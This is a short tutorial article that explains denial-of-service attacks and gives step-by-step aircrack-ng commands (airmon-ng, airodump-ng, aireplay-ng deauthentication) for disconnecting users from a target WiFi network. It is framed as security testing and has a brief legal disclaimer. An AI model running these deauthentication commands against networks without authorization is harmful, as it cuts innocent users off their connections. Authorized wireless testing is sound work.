Open In App

Wireless DOS Attack on WiFi

Dos attack is a denial-of-service attack which affects the server or a website via sending a request of traffic and making it unreachable or unavailable.This article will help you to know the working of a dos attack on a Wifi. 

What does a DOS Attack do?

 A Dos attack means to shut down a computer or the whole network, making it unreachable to its users. It is accomplished by sending a huge request traffic, or by sending some data that make the server crash. Attackers mainly target web servers like media companies, e-commerce websites, banking, etc. Most of the time, a dos attack doesn’t result in loss of data. 



Types of Dos Attack

There are 3 types of Dos attacks:

1.  Application-layer flood: In this type of attack, an attacker sends a large number of requests on a server, which results in server crashes and slow speeds of the network. In  Application-layer flood requests may vary within the range of thousands in a second to million, which consume huge resources until the server crash or is unreachable to the user.



2. Distributed Denial of Services Attacks: There is not much difference between a Dos and DDoS attack. In this attack, not only one computer sends requests but several computers are engaged in sending requests to a specific target, making it disabled. These computers have been hacked earlier and can be controlled by the attacker.

3. Unintended Denial of Service Attacks: This type of attack is wicked, i.e they are not nefarious. In this attack, websites are overwhelmingly flooded with legitimate traffic to their destination where the server is brought down completely.

How To Perform a DOS Attack on WiFi?

Hacking wifi is the best way to check the security parameters and vulnerabilities over a network. In this attack, we will use aircrack-ng and make the user unable to use wifi via dos attack. In this attack, we will just scan all available Wifi networks and collect their BSSID, channel, and type of security. Then we will disable user access from wifi by sending packets to its wireless access point.

NOTE: Do not use dos attack for illegal purposes, this article will not be responsible for any illegal activity.

Before starting, make sure you have a kali-linux in your computer and a Wifi adaptor with monitor mode.

sudo apt update && sudo apt upgrade

Now, you are ready to perform a dos attack.

   airmon-ng start <wifi name>

   iwconfig

airodump-ng -i <wifi name>

aireplay-ng -0 <number of packets> -a <bssid of target network> -c <target client> <wifi name>

  1. bssid of target network = copy the BSSID of victim’s router.
  2. Target client=paste the MAC address of the user, you want to disconnect specifically. (optional)
  3. Wifi name= your adaptor name.

airodump-ng -c <broadcasting channel of router> -i  <wifi name>

aireplay-ng -0 <number of packets> -a <bssid of target network> -c <target client> <wifi name>

Now, no user will have permission to connect with the network until we stop sending packets.

Conclusion

As we know, a Dos attack is a very genuine threat and it will affect the system or network brutally. Dos attacks are performed intentionally and sometimes they happen unintentionally as discussed above. So this is the dos attack we perform on the wireless networks and make all connected users inaccessible from the network.

Article Tags :